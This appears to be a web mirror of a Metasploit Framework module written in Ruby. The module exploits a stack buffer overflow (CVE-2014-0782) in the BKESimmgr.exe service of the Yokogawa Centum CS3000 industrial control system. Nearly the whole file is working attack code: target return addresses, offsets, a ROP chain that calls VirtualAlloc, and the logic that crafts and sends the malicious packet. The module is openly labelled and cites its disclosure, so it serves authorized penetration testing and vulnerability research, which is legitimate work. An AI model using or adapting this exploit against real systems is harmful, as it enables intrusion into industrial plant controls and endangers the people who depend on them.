CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',

14
      'Description'    => %q{

15
        This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability

16
        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an

17
        insecure usage of memcpy, using attacker controlled data as the size count. This module

18
        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows

19
        2003 SP2.

20
      },

21
      'Author'         =>

22
        [

23
          'juan vazquez',

24
          'Redsadic <julian.vilas[at]gmail.com>'

25
        ],

26
      'References'     =>

27
        [

28
          ['CVE', '2014-0782'],

29
          ['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],

30
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']

31
        ],

32
      'Payload'        =>

33
        {

34
          'Space'          => 340,

35
          'DisableNops'    => true,

36
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

37
        },

38
      'Platform'       => 'win',

39
      'Targets'        =>

40
        [

41
          [

42
            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',

43
            {

44
              'Ret'           => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll

45
              'Offset'        => 64,

46
              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe

47
              'FakeArgument2' => 0x0040EB90  # ptr to .data on BKESimmgr.exe

48
            }

49
          ],

50
        ],

51
      'DisclosureDate' => '2014-03-10',

52
      'DefaultTarget'  => 0))

53


54
    register_options(

55
      [

56
        Opt::RPORT(34205)

57
      ])

58
  end

59


60
  def check

61
    data = create_pkt(rand_text_alpha(4))

62


63
    res = send_pkt(data)

64


65
    if res && res.length == 10

66
      simmgr_res = parse_response(res)

67


68
      if valid_response?(simmgr_res)

69
        check_code = Exploit::CheckCode::Appears

70
      else

71
        check_code = Exploit::CheckCode::Safe

72
      end

73
    else

74
      check_code = Exploit::CheckCode::Safe

75
    end

76


77
    check_code

78
  end

79


80
  def exploit

81
    bof = rand_text(target['Offset'])

82
    bof << [target.ret].pack("V")

83
    bof << [target['FakeArgument1']].pack("V")

84
    bof << [target['FakeArgument2']].pack("V")

85
    bof << rand_text(16)  # padding (corrupted bytes)

86
    bof << create_rop_chain

87
    bof << payload.encoded

88


89
    data = [0x1].pack("N")         # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0

90
    data << [bof.length].pack("n")

91
    data << bof

92


93
    pkt = create_pkt(data)

94


95
    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")

96
    connect

97
    sock.put(pkt)

98
    disconnect

99
  end

100


101
  def create_rop_chain

102
    # rop chain generated with mona.py - www.corelan.be

103
    rop_gadgets =

104
      [

105
        0x004047ca, # POP ECX # RETN [BKESimmgr.exe]

106
        0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]

107
        0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]

108
        0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]

109
        0x619436d3, # POP EBP # RETN [libbkeeda.dll]

110
        0x61615424, # & push esp #  ret  [libbkeldc.dll]

111
        0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]

112
        0x00000001, # 0x00000001-> ebx

113
        0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]

114
        0x00001000, # 0x00001000-> edx

115
        0x0040765a, # POP ECX # RETN [BKESimmgr.exe]

116
        0x00000040, # 0x00000040-> ecx

117
        0x6191aaab, # POP EDI # RETN [libbkeeda.dll]

118
        0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]

119
        0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]

120
        0x90909090, # nop

121
        0x619532eb  # PUSHAD # RETN [libbkeeda.dll]

122
      ].pack("V*")

123


124
    rop_gadgets

125
  end

126


127
  def create_pkt(data)

128
    pkt = [0x01].pack("N")         # Operation Identifier

129
    pkt << [data.length].pack("n") # length

130
    pkt << data                    # Fake packet

131


132
    pkt

133
  end

134


135
  def send_pkt(data)

136
    connect

137
    sock.put(data)

138
    res = sock.get_once

139
    disconnect

140


141
    res

142
  end

143


144
  def parse_response(data)

145
    data.unpack("NnN")

146
  end

147


148
  def valid_response?(data)

149
    valid = false

150


151
    if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5

152
      valid = true

153
    end

154


155
    valid

156
  end

157
end

158


159